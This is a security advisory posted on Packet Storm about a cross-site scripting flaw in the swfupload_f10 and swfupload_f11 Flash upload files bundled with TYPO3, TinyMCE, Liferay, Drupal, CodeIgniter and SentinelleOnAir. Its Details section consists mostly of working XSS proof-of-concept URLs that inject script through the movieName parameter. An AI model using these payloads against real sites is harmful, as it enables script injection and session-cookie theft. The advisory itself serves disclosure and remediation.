what you don't know can hurt you

SWF Upload f10 / f11 Cross Site Scripting

SWF Upload f10 / f11 Cross Site Scripting
Posted Nov 25, 2012
Authored by MustLive

swfupload_f10.swf and swfupload_f11.swf both suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 61ebceb5e232674822caea26d5a36ea6

SWF Upload f10 / f11 Cross Site Scripting

Change Mirror Download
Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. This is finial advisory concerning different versions of
this flash application. Earlier I've wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.

In previous letters I've wrote concerning web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). And now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir - among multiple web applications which
are bundled with swfupload_f10.swf or swfupload_f11.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that
they have fixed this vulnerability in their software (at that this
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described
earlier swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides described earlier
swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then
in Google's index there is only one project - SentinelleOnAir, which
contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close